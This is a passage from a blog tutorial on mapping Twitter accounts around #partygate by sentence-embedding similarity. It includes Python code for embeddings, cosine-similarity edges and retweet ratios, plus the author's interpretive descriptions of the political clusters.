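def frequent_users(tweets: pd.DataFrame, min_interactions: int = 3) -> list:
    """Return the screen names that appear in at least min_interactions rows.

    With the default of 3, accounts with two or fewer interactions are dropped.
    """
    counts = tweets["user_screen_name"].value_counts()
    keep = counts[counts >= min_interactions]
    return sorted(keep.index.tolist())
```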
&lt;h2&gt;Account Representation&lt;/h2&gt;
&lt;p&gt;As discussed, instead of a more traditional network map that groups accounts based on friend-follower relationships, we map relationships based on the similarity of the language used in the tweets that each account posted or amplified. By retrieving the last 200 tweets from each account (not only those mentioning #partygate), we can identify communities of accounts defined by common linguistic attributes. To do this, tweets are first mapped to a vector space using a pre-trained sentence encoder, in this case &lt;a href=&quot;https://huggingface.co/sentence-transformers/all-distilroberta-v1&quot;&gt;all-distilroberta-v1&lt;/a&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Future work&lt;/strong&gt;: Arguably, the most recent 200 tweets aren’t reflective of an account’s complete activity timeline. The dataset could be enriched by incorporating a vector representation of the bio, geotagging information, or object detection applied to the profile image.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;For each account, the transformer was used to map each tweet into a 768-dimensional space, and the tweet vectors were then averaged to give an account-level representation. Given the number of calculations required, this part of the process was sped up by using a cloud GPU server with more memory than I had available on my laptop: a &lt;a href=&quot;https://www.paperspace.com/&quot;&gt;Paperspace&lt;/a&gt; GPU+ instance with 30GB RAM and a Quadro M4000 GPU.&lt;/p&gt;
&lt;p&gt;The CSV files created in the “Data Collection” phase above were placed into a &lt;code class=&quot;language-text&quot;&gt;triaged_csvs&lt;/code&gt; folder, and the code below was run to compute the account representation vectors (saved to &lt;code class=&quot;language-text&quot;&gt;account_representations.csv&lt;/code&gt;).&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;import os
import re
import string

import pandas as pd
from sentence_transformers import SentenceTransformer
from tqdm import tqdm

directory = &amp;#39;triaged_csvs&amp;#39;
model = SentenceTransformer(&amp;#39;sentence-transformers/all-distilroberta-v1&amp;#39;)
user_account_representations = []

def remove_punct(text):
    # Strip punctuation characters, then any runs of digits
    text = text.translate(str.maketrans(&amp;#39;&amp;#39;, &amp;#39;&amp;#39;, string.punctuation))
    return re.sub(&amp;#39;[0-9]+&amp;#39;, &amp;#39;&amp;#39;, text)

for filename in tqdm(os.listdir(directory)):
    # Files are named new_{screen_name}_tweets.csv; skip anything else
    if not (filename.startswith(&amp;#39;new_&amp;#39;) and filename.endswith(&amp;#39;_tweets.csv&amp;#39;)):
        continue
    username = filename[len(&amp;#39;new_&amp;#39;):-len(&amp;#39;_tweets.csv&amp;#39;)]
    temp_df = pd.read_csv(os.path.join(directory, filename))
    # Drop missing values (e.g. empty timelines) before cleaning the text
    texts = temp_df[&amp;#39;text&amp;#39;].dropna().astype(str).apply(remove_punct).tolist()
    if not texts:
        continue
    # Encode all of the account&amp;#39;s tweets in one batched call: shape (n_tweets, 768)
    embeddings = model.encode(texts)
    # Average the tweet vectors into a single account-level representation
    user_account_representations.append([username, embeddings.mean(axis=0)])

df = pd.DataFrame(user_account_representations)
df.to_csv(&amp;#39;account_representations.csv&amp;#39;)&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
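&lt;p&gt;Averaging is the step that turns a timeline into a single point in the 768-dimensional space. The sketch below isolates that step, assuming &lt;code class=&quot;language-text&quot;&gt;encode&lt;/code&gt; is any callable that maps a list of strings to an (n, d) array (&lt;code class=&quot;language-text&quot;&gt;SentenceTransformer.encode&lt;/code&gt; behaves this way and accepts a &lt;code class=&quot;language-text&quot;&gt;batch_size&lt;/code&gt; argument). Encoding a whole timeline in one call lets the library batch tweets on the GPU, which is usually much faster than encoding them one at a time. The function name is hypothetical.&lt;/p&gt;

```python
from typing import Callable, Optional, Sequence

import numpy as np


def account_vector(
    tweets: Sequence[str],
    encode: Callable[..., np.ndarray],
    batch_size: int = 64,
) -> Optional[np.ndarray]:
    """Return the mean embedding of an account's tweets, or None for an empty timeline."""
    if len(tweets) == 0:
        return None
    # One batched call: shape (number_of_tweets, embedding_dimension)
    embeddings = np.asarray(encode(list(tweets), batch_size=batch_size))
    # Average over tweets to get a single account-level vector
    return embeddings.mean(axis=0)
```

&lt;p&gt;For example, &lt;code class=&quot;language-text&quot;&gt;account_vector(texts, model.encode)&lt;/code&gt; with the all-distilroberta-v1 model loaded above should return a vector of length 768.&lt;/p&gt;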
&lt;h2&gt;Account Network Construction&lt;/h2&gt;
&lt;p&gt;To construct a network diagram in which each node is a Twitter account and weighted edges represent the similarity between two accounts, the cosine similarity between every pair of account vectors had to be calculated. Specifically, the weight of an edge between two accounts is the cosine similarity of their account-level representations (averaged tweet vectors). This was another computationally intensive step that benefitted from cloud computing: with a pairwise calculation required across every account vector (each an array of length 768), the script below took over 20 hours to complete.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;import itertools

import numpy as np
import pandas as pd
from numpy import dot
from numpy.linalg import norm
from tqdm import tqdm

df = pd.read_csv(&amp;#39;account_representations.csv&amp;#39;)
df = df.dropna()

df.columns = [&amp;#39;index&amp;#39;, &amp;#39;username&amp;#39;, &amp;#39;vector&amp;#39;]

def vectoriser(text):
    # Vectors were written to the CSV as strings such as &amp;quot;[0.12 -0.03 ...]&amp;quot;;
    # strip the brackets and parse the whitespace-separated floats
    stripped = text.replace(&amp;#39;[&amp;#39;, &amp;#39;&amp;#39;).replace(&amp;#39;]&amp;#39;, &amp;#39;&amp;#39;)
    return np.fromstring(stripped, dtype=float, sep=&amp;#39; &amp;#39;)

df[&amp;#39;new&amp;#39;] = df[&amp;#39;vector&amp;#39;].apply(vectoriser)
df.drop([&amp;#39;index&amp;#39;, &amp;#39;vector&amp;#39;], axis=1, inplace=True)
data = []

usernames = df[&amp;#39;username&amp;#39;].tolist()
n_pairs = len(usernames) * (len(usernames) - 1) // 2
for user_a, user_b in tqdm(itertools.combinations(usernames, 2), total=n_pairs):
    # Look up both account vectors (scanning the DataFrame for every pair is slow)
    x = df.loc[df.username == user_a, &amp;#39;new&amp;#39;].to_numpy()[0]
    y = df.loc[df.username == user_b, &amp;#39;new&amp;#39;].to_numpy()[0]
    # Cosine similarity: dot product divided by the product of the vector norms
    result = dot(x, y) / (norm(x) * norm(y))
    data.append([user_a, user_b, result])

df_final = pd.DataFrame(data)
df_final.to_csv(&amp;#39;mappings.csv&amp;#39;)&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Displaying every edge would almost certainly produce an indecipherable blob, given that 4,906 accounts yield around 12 million pairwise edges (4,906 × 4,905 / 2), so the dataset was reduced to preserve only the relationships between the most similar nodes. Keeping only the 250,000 most highly weighted edges excluded 247 accounts from the network, on the grounds that they were not sufficiently similar to any other account.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/gephi/gephi&quot;&gt;Gephi&lt;/a&gt; was used to graph the network. For positioning nodes, the &lt;a href=&quot;https://journals.plos.org/plosone/article?id=10.1371/journal.pone.0098679#:~:text=ForceAtlas2%20is%20a%20force%2Ddirected,local%20and%20global%20adaptive%20temperatures.&quot;&gt;ForceAtlas2&lt;/a&gt; layout algorithm was applied; it is a widely used approach to spatialising a weighted, undirected network in two dimensions. For community detection, Gephi uses the Louvain method, a modularity-based algorithm that assigns each node to a single community. Approximately 99% of accounts were assigned to one of three communities.&lt;/p&gt;
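&lt;p&gt;Most of the 20 hours quoted above is likely spent looking up two vectors in the DataFrame for every pair inside a Python loop. A vectorised alternative, sketched here under the assumption that the account vectors fit in memory as a single (n, 768) NumPy array with no all-zero rows, normalises every vector once, computes all cosine similarities with one matrix product, and keeps the k most similar pairs (k = 250,000 in this analysis). For 4,906 accounts the full similarity matrix holds about 24 million floats (roughly 190 MB as float64). The helper names, and the &lt;code class=&quot;language-text&quot;&gt;Source&lt;/code&gt;/&lt;code class=&quot;language-text&quot;&gt;Target&lt;/code&gt;/&lt;code class=&quot;language-text&quot;&gt;Weight&lt;/code&gt;/&lt;code class=&quot;language-text&quot;&gt;Type&lt;/code&gt; column layout used for Gephi’s spreadsheet import, are assumptions rather than the workflow used here.&lt;/p&gt;

```python
import csv
from typing import List, Sequence, TextIO, Tuple

import numpy as np

Edge = Tuple[str, str, float]


def top_edges(names: Sequence[str], vectors: np.ndarray, k: int) -> List[Edge]:
    """Return the k most cosine-similar pairs of accounts, most similar first."""
    X = np.asarray(vectors, dtype=float)
    # L2-normalise each row so that a dot product equals cosine similarity
    X = X / np.linalg.norm(X, axis=1, keepdims=True)
    sims = X @ X.T
    # Keep each unordered pair once: upper triangle, diagonal excluded
    rows, cols = np.triu_indices(len(names), k=1)
    pair_sims = sims[rows, cols]
    k = min(k, pair_sims.size)
    if k == 0:
        return []
    # argpartition finds the k largest values without a full sort; then order them
    top = np.argpartition(pair_sims, -k)[-k:]
    top = top[np.argsort(pair_sims[top])[::-1]]
    return [(names[rows[i]], names[cols[i]], float(pair_sims[i])) for i in top]


def write_gephi_edges(edges: Sequence[Edge], fileobj: TextIO) -> None:
    """Write an undirected, weighted edge list as CSV with Gephi-style column names."""
    writer = csv.writer(fileobj)
    writer.writerow(["Source", "Target", "Weight", "Type"])
    for source, target, weight in edges:
        writer.writerow([source, target, weight, "Undirected"])
```

&lt;p&gt;Passing the output of &lt;code class=&quot;language-text&quot;&gt;top_edges(usernames, vectors, 250000)&lt;/code&gt; to &lt;code class=&quot;language-text&quot;&gt;write_gephi_edges&lt;/code&gt;, with a file opened in text mode and newline set to an empty string, should give an edge list that Gephi can load as an undirected, weighted network.&lt;/p&gt;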
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/763fab8549088478e0e6724a085ffb23/efcb3/cropped.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 83.1081081081081%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAARABQDASIAAhEBAxEB/8QAGAABAAMBAAAAAAAAAAAAAAAAAAEDBAX/xAAVAQEBAAAAAAAAAAAAAAAAAAAAAv/aAAwDAQACEAMQAAAB7me+hOsKkAH/xAAaEAEAAwADAAAAAAAAAAAAAAACAQMRABIg/9oACAEBAAEFAkoMG7VxjtBqxeP/xAAWEQADAAAAAAAAAAAAAAAAAAARICH/2gAIAQMBAT8BpT//xAAWEQEBAQAAAAAAAAAAAAAAAAARASD/2gAIAQIBAT8BGY//xAAXEAEAAwAAAAAAAAAAAAAAAAARAAEw/9oACAEBAAY/Am4GH//EABkQAQADAQEAAAAAAAAAAAAAAAEAESEQIP/aAAgBAQABPyGaHPEeBVK5XDz/AP/aAAwDAQACAAMAAAAQm8AA/8QAFxEBAAMAAAAAAAAAAAAAAAAAASAhMf/aAAgBAwEBPxAHfIf/xAAWEQEBAQAAAAAAAAAAAAAAAAABESD/2gAIAQIBAT8QTQY4/8QAHBABAAEEAwAAAAAAAAAAAAAAAREAECFBIDFR/9oACAEBAAE/EEK40HbSPC4Gclp3YdPlMJOUjbx//9k=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Chart&quot;
        title=&quot;Chart&quot;
        src=&quot;/static/763fab8549088478e0e6724a085ffb23/1c72d/cropped.jpg&quot;
        srcset=&quot;/static/763fab8549088478e0e6724a085ffb23/a80bd/cropped.jpg 148w,
/static/763fab8549088478e0e6724a085ffb23/1c91a/cropped.jpg 295w,
/static/763fab8549088478e0e6724a085ffb23/1c72d/cropped.jpg 590w,
/static/763fab8549088478e0e6724a085ffb23/a8a14/cropped.jpg 885w,
/static/763fab8549088478e0e6724a085ffb23/fbd2c/cropped.jpg 1180w,
/static/763fab8549088478e0e6724a085ffb23/efcb3/cropped.jpg 1545w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;Community Characterisation&lt;/h2&gt;
&lt;p&gt;The next step in the process was to manually inspect accounts from each community (Blue, Green and Pink) to identify the attributes they had in common. To characterise each community in this way, accounts were randomly selected from its core, considered to be the dense region around the community’s ‘centre’ as suggested by the network’s spatial layout. Between 50 and 150 messages from each account’s timeline were read to create a narrative summary of the content that the account had either authored or amplified.&lt;/p&gt;
&lt;p&gt;Features analysed included:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The profile picture of the account (especially the presence of motifs, tropes, regional or national identifiers);&lt;/li&gt;
&lt;li&gt;The profile description of the account (interests, hobbies, political or ideological attachments);&lt;/li&gt;
&lt;li&gt;The number of followers of the account;&lt;/li&gt;
&lt;li&gt;The number of accounts that the account follows;&lt;/li&gt;
&lt;li&gt;The number of tweets sent by the account;&lt;/li&gt;
&lt;li&gt;The retweet:tweet ratio of the account.&lt;/li&gt;
&lt;/ul&gt;
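&lt;p&gt;The retweet:tweet ratio can be estimated from the timeline CSVs collected earlier. The sketch below assumes that retweets can be recognised by the &lt;code class=&quot;language-text&quot;&gt;RT @&lt;/code&gt; prefix that the Twitter v1.1 API places at the start of a retweet’s text; this is a heuristic (a manually typed “RT @” would also match), and the function names are hypothetical.&lt;/p&gt;

```python
from typing import Iterable, Tuple


def retweet_counts(texts: Iterable[str]) -> Tuple[int, int]:
    """Return (retweets, original_tweets) for one account's timeline texts."""
    retweets = originals = 0
    for text in texts:
        if text.startswith("RT @"):
            retweets += 1
        else:
            originals += 1
    return retweets, originals


def retweet_share(texts: Iterable[str]) -> float:
    """Fraction of timeline entries that are retweets (0.0 for an empty timeline)."""
    retweets, originals = retweet_counts(texts)
    total = retweets + originals
    return retweets / total if total else 0.0
```

&lt;p&gt;Averaging &lt;code class=&quot;language-text&quot;&gt;retweet_share&lt;/code&gt; over the accounts in a cluster gives a figure comparable to the retweet percentages quoted in the cluster descriptions, although the exact aggregation behind those figures is not stated.&lt;/p&gt;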
&lt;p&gt;The characterisation of each cluster below is interpretive in nature, and therefore reflects not only the data but also the judgements and biases of the analyst (&lt;a href=&quot;https://twitter.com/df_works&quot;&gt;me&lt;/a&gt;). The descriptions do not imply that every node within a community cluster displays the characteristics detailed; there will be significant ‘noise’, particularly at the edges of the clusters, where nodes do not behave in the way that the cluster description would suggest.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Tip&lt;/strong&gt;: Manual tweet analysis was conducted by one person in this investigation, which increases the likelihood that analyst bias affected the community characterisation. To reduce the effects of analyst bias on your own study, consider having multiple analysts review the tweets independently.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/8bd6ef0af18167465130d239652e7ba8/f8188/labelled.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 55.4054054054054%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAALABQDASIAAhEBAxEB/8QAGAAAAgMAAAAAAAAAAAAAAAAAAAIDBAX/xAAVAQEBAAAAAAAAAAAAAAAAAAAAAf/aAAwDAQACEAMQAAAB2oLiIwov/8QAGBAAAwEBAAAAAAAAAAAAAAAAAQIQEQD/2gAIAQEAAQUCzORy7Qif/8QAFhEAAwAAAAAAAAAAAAAAAAAAEBEh/9oACAEDAQE/AVR//8QAFBEBAAAAAAAAAAAAAAAAAAAAEP/aAAgBAgEBPwE//8QAGBAAAgMAAAAAAAAAAAAAAAAAABEgIjH/2gAIAQEABj8CZbI//8QAGxAAAwACAwAAAAAAAAAAAAAAAAERECFBUcH/2gAIAQEAAT8hbXVnA+KPAolrCuhKLR//2gAMAwEAAgADAAAAEDv/AP/EABYRAQEBAAAAAAAAAAAAAAAAAAARQf/aAAgBAwEBPxDSo//EABcRAAMBAAAAAAAAAAAAAAAAAAABIRH/2gAIAQIBAT8QjVMP/8QAHBABAQACAgMAAAAAAAAAAAAAAREAIRAxQXGR/9oACAEBAAE/EDRTC6d5Koyw19ZNET3wkNNpZ5wJCGf/2Q==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Labelled Chart&quot;
        title=&quot;Labelled Chart&quot;
        src=&quot;/static/8bd6ef0af18167465130d239652e7ba8/1c72d/labelled.jpg&quot;
        srcset=&quot;/static/8bd6ef0af18167465130d239652e7ba8/a80bd/labelled.jpg 148w,
/static/8bd6ef0af18167465130d239652e7ba8/1c91a/labelled.jpg 295w,
/static/8bd6ef0af18167465130d239652e7ba8/1c72d/labelled.jpg 590w,
/static/8bd6ef0af18167465130d239652e7ba8/a8a14/labelled.jpg 885w,
/static/8bd6ef0af18167465130d239652e7ba8/fbd2c/labelled.jpg 1180w,
/static/8bd6ef0af18167465130d239652e7ba8/f8188/labelled.jpg 1494w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;Blue Community Cluster&lt;/h2&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/eb6a383e762387be6b3f1910a09caae9/22d3c/blue.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 95.94594594594595%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAATABQDASIAAhEBAxEB/8QAGAABAAMBAAAAAAAAAAAAAAAAAAMEBQL/xAAXAQADAQAAAAAAAAAAAAAAAAACAwQA/9oADAMBAAIQAxAAAAHdimzjTE4ZO1XBppCkv//EABkQAAIDAQAAAAAAAAAAAAAAAAEDAAIQEv/aAAgBAQABBQLkRjOYb2JMaNYM/8QAGhEAAgIDAAAAAAAAAAAAAAAAAAECMQMhIv/aAAgBAwEBPwHLJxWjolQqP//EABoRAAICAwAAAAAAAAAAAAAAAAABAgMQETH/2gAIAQIBAT8BgtsdaI9x/8QAFRABAQAAAAAAAAAAAAAAAAAAIBH/2gAIAQEABj8CFP8A/8QAHBAAAwACAwEAAAAAAAAAAAAAAAERMUEQcYGR/9oACAEBAAE/Iez6IWZZZNvwrQ21snCHlDUP/9oADAMBAAIAAwAAABAH4ML/xAAYEQEBAQEBAAAAAAAAAAAAAAABABEhMf/aAAgBAwEBPxCSNm9iN8r/xAAXEQEAAwAAAAAAAAAAAAAAAAABABAR/9oACAECAQE/EByYps//xAAdEAEAAgICAwAAAAAAAAAAAAABABEhMUFRYYGx/9oACAEBAAE/EHZ9JSFLx1HBXjAipQ9wLfaoJIQ4yVaQFQYn/9k=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Blue Chart&quot;
        title=&quot;Blue Chart&quot;
        src=&quot;/static/eb6a383e762387be6b3f1910a09caae9/1c72d/blue.jpg&quot;
        srcset=&quot;/static/eb6a383e762387be6b3f1910a09caae9/a80bd/blue.jpg 148w,
/static/eb6a383e762387be6b3f1910a09caae9/1c91a/blue.jpg 295w,
/static/eb6a383e762387be6b3f1910a09caae9/1c72d/blue.jpg 590w,
/static/eb6a383e762387be6b3f1910a09caae9/22d3c/blue.jpg 654w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The Blue Community Cluster is not visually distinct from the larger central grouping on the chart, occupying ~35% of it. It is the sparsest of the clusters, with many accounts sitting away from the central grouping, demonstrating a broader set of linguistic characteristics than the other clusters. The Blue and Pink Community Clusters share many of the same characteristics, namely: pro-Labour, pro-EU, pro-Keir Starmer, anti-Conservative and anti-Boris Johnson tweets. The two clusters differed in the themes that were amplified. Of note in the Blue cluster was the amplification of tweets highlighting Nadine Dorries’ &lt;a href=&quot;https://www.thenational.scot/news/20110252.nadine-dorries-spreading-disinformation-keir-starmer-beergate-row-snp-mp-says/&quot;&gt;propagation of disinformation&lt;/a&gt; concerning Keir Starmer, and the lack of coverage, particularly by the BBC, of the raid on &lt;a href=&quot;https://www.theguardian.com/uk-news/2022/apr/29/nca-launches-investigation-ppe-firm-linked-to-michelle-mone&quot;&gt;Michelle Mone’s residence&lt;/a&gt;. Given the high volume of retweets in this cluster (97%), it is almost certain that it coalesced around prominent tweets that were shared across many of the accounts. It is also probable that there was significant ‘bot’ activity, given the lack of original content and the relatively low average follower count of accounts in this cluster.&lt;/p&gt;
&lt;h2&gt;Pink Community Cluster&lt;/h2&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/17764e10de527cdc95b66dfd18bb0fe4/b4294/pink.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 95.94594594594595%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAATABQDASIAAhEBAxEB/8QAGAABAQEBAQAAAAAAAAAAAAAAAAEEAgP/xAAWAQEBAQAAAAAAAAAAAAAAAAAAAQP/2gAMAwEAAhADEAAAAfe67rNDplbAoP/EABoQAAICAwAAAAAAAAAAAAAAAAECABADETL/2gAIAQEAAQUCpeTiiKAa1X//xAAWEQEBAQAAAAAAAAAAAAAAAAACASD/2gAIAQMBAT8BBhmP/8QAFhEBAQEAAAAAAAAAAAAAAAAAARIg/9oACAECAQE/AWXH/8QAFxABAAMAAAAAAAAAAAAAAAAAEAEgIf/aAAgBAQAGPwIg2v8A/8QAGxABAQEAAgMAAAAAAAAAAAAAAQARECExQVH/2gAIAQEAAT8hCyOBY+G7ThPTxheyw+X/2gAMAwEAAgADAAAAEGTPAP/EABQRAQAAAAAAAAAAAAAAAAAAACD/2gAIAQMBAT8QCf/EABURAQEAAAAAAAAAAAAAAAAAABEg/9oACAECAQE/ECMf/8QAHBABAAICAwEAAAAAAAAAAAAAAQARIWEQMUGB/9oACAEBAAE/EPdhdALYpnhFDm1LwAmQWoowJp4ygLsgXQPk/9k=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Pink Chart&quot;
        title=&quot;Pink Chart&quot;
        src=&quot;/static/17764e10de527cdc95b66dfd18bb0fe4/1c72d/pink.jpg&quot;
        srcset=&quot;/static/17764e10de527cdc95b66dfd18bb0fe4/a80bd/pink.jpg 148w,
/static/17764e10de527cdc95b66dfd18bb0fe4/1c91a/pink.jpg 295w,
/static/17764e10de527cdc95b66dfd18bb0fe4/1c72d/pink.jpg 590w,
/static/17764e10de527cdc95b66dfd18bb0fe4/b4294/pink.jpg 600w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The Pink Community Cluster is not visually distinct from the larger central grouping on the chart, occupying ~33% of it. It has fewer outliers than the Blue cluster but is not as densely concentrated as the Green cluster. As mentioned, the Blue and Pink Community Clusters share many of the same characteristics; however, the Pink cluster had a greater volume of tweets that were specifically anti-Boris Johnson. In addition, the tweets analysed in this cluster discussed the ongoing local elections (as of May 2022) and Boris Johnson’s unsuitability for the roles of Prime Minister and leader of the Conservative Party. Given the high volume of retweets in this cluster (98%), it is almost certain that it coalesced around prominent tweets that were shared across many of the accounts. It is also probable that there was significant ‘bot’ activity, given the lack of original content and the relatively low average follower count of accounts in this cluster.&lt;/p&gt;
&lt;h2&gt;Green Community Cluster&lt;/h2&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/1b9354d804d4799ce69e2d777231cc7e/9453e/green.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 57.432432432432435%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAALABQDASIAAhEBAxEB/8QAGQAAAgMBAAAAAAAAAAAAAAAAAAECAwQF/8QAFAEBAAAAAAAAAAAAAAAAAAAAA//aAAwDAQACEAMQAAAB1uiQD1xjt//EABsQAAIBBQAAAAAAAAAAAAAAAAECAAMQERIx/9oACAEBAAEFAjVYxHO2LDs//8QAFhEBAQEAAAAAAAAAAAAAAAAAAQIQ/9oACAEDAQE/AYVz/8QAFhEBAQEAAAAAAAAAAAAAAAAAAQIQ/9oACAECAQE/AaErP//EABcQAAMBAAAAAAAAAAAAAAAAAAABESD/2gAIAQEABj8CFc//xAAaEAEAAwADAAAAAAAAAAAAAAABABExECFx/9oACAEBAAE/IWOmiKsqZAHGHsMn/9oADAMBAAIAAwAAABDMD//EABURAQEAAAAAAAAAAAAAAAAAAAEQ/9oACAEDAQE/EABWf//EABYRAQEBAAAAAAAAAAAAAAAAAAEQEf/aAAgBAgEBPxBljP/EABsQAAMAAgMAAAAAAAAAAAAAAAABIRFBMVGR/9oACAEBAAE/EG13oloTT3VFOFn02Rh6HAf/2Q==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Green Chart&quot;
        title=&quot;Green Chart&quot;
        src=&quot;/static/1b9354d804d4799ce69e2d777231cc7e/1c72d/green.jpg&quot;
        srcset=&quot;/static/1b9354d804d4799ce69e2d777231cc7e/a80bd/green.jpg 148w,
/static/1b9354d804d4799ce69e2d777231cc7e/1c91a/green.jpg 295w,
/static/1b9354d804d4799ce69e2d777231cc7e/1c72d/green.jpg 590w,
/static/1b9354d804d4799ce69e2d777231cc7e/9453e/green.jpg 614w&quot;
